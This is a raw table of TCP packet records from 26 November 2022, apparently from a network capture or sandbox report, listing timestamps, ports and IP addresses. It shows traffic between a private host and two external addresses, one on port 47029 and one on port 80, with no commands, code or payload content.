Nov 26, 2022 11:17:36.922019958 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.922449112 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.922480106 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.922511101 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.922950983 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.923120975 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.923336983 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.923610926 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.923819065 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.923896074 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.923928022 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.924256086 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.924455881 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.924909115 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.924942017 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.925055027 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.925498009 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.925611973 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.925894976 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.925925970 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.926372051 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.961972952 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.962217093 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.962217093 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.962337017 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.962414980 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.017999887 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.018054962 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.018085003 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.018114090 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.018316984 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.018487930 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.018851995 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.019002914 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.019256115 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.019412041 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.019651890 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.019757032 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.019963026 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.020287037 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.020318985 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.020448923 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.020617962 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.020770073 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.020920038 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.021203041 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.021234989 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.021646023 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.021761894 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.022042990 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.022197962 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.022319078 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.057329893 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.057531118 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.057531118 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.057691097 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.057781935 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.113090992 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.113183975 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.113365889 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.113399029 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.113446951 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.113647938 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.113858938 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.113996029 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.114245892 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.114276886 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.114425898 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.114686966 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.114782095 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.114927053 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.115317106 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.115353107 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.115463018 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.115618944 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.115853071 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.116194010 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.116302967 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.116586924 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.116704941 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.116734982 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.116945982 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.117232084 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.117285013 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.117501974 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.480097055 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.480215073 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.480215073 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.480283022 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.480321884 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.535821915 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.535873890 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.535943985 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.535979986 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.536180019 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.536340952 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.536504984 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.536683083 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.536854029 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.537028074 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.537195921 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.537377119 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.537570000 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.537744999 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.537777901 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.538093090 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.538141966 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.538321972 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.538575888 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.538654089 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.538988113 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.539112091 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.539143085 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.539222002 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.539482117 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.539738894 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.539910078 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.540122032 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.593796968 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.593864918 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.593899012 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.593929052 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.594247103 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.594278097 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.594429970 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.594589949 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.594794035 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.595276117 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.595309973 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.599469900 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.654249907 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.746936083 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.802629948 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.802733898 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.802766085 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.804145098 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.805329084 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.862032890 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:37.904283047 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.922666073 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:37.979731083 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:38.107424021 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:39.162262917 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:39.223829985 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:39.310691118 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:39.890727043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.908410072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.908581018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.908879995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.925826073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.953476906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.953566074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.953613043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.953661919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.953676939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.953732014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.953737020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.953797102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.953841925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.953860998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.953910112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.953974009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.953974962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.954040051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.954096079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.954112053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.954166889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.954216957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.954258919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.954301119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.954313993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.954334021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.954381943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.954448938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.954961061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.955008984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.955053091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.955068111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.955117941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.955164909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.956218958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.956270933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.956311941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.956336021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.956377983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.956438065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.956540108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.956583023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.956630945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.956649065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.956697941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.956753016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.957402945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.957448959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.957505941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.971263885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.971350908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.971391916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.971434116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.971518040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.971556902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.971607924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.971658945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.971703053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.971723080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.971766949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.971829891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.972420931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.972469091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.972513914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.972554922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.972989082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.973032951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.973074913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.973094940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.973150015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.973160028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.973858118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.973906040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.973946095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.973964930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.974020958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.974025965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.974613905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.974662066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.974689960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.974730968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.974781990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.974806070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.975413084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.975459099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.975500107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.975522995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.975580931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.975589991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.976244926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.976296902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.976344109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.976350069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.976411104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.976414919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.977051020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.977094889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.977145910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.977149963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.977211952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.977227926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.977871895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.978004932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.978065014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.978115082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.978158951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.978184938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.978225946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.978302002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.978842020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.978929043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.978979111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.979007959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.979043961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.979113102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.979691982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.979738951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.979818106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.979866982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.979883909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.979932070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.980452061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.980496883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.980539083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.980560064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.988750935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.988810062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.988854885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.988898993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.988909960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.988941908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.988972902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.989022970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.989032984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.989083052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.989129066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.989144087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.989928961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.989969015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.990001917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.990015030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.990060091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.990784883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.990827084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.990866899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.990911007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.990950108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.990997076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.991022110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.991658926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.991770983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.991914988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.991960049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.992005110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.992022991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.992072105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.992132902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.992403030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.992449045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.992491961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.992513895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.992558002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.992614031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.992619991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.994025946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.994069099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.994110107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.994127035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.994187117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.994188070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.994247913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.994306087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.995050907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.995096922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.995140076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.995167971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.995204926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.995259047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.995268106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.995847940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.995893002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.995928049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.995958090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.996011972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.996016979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.996074915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.996131897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:39.996665955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.996710062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.996752024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.996773958 CET	49707	80	192.168.2.5	66.235.200.147
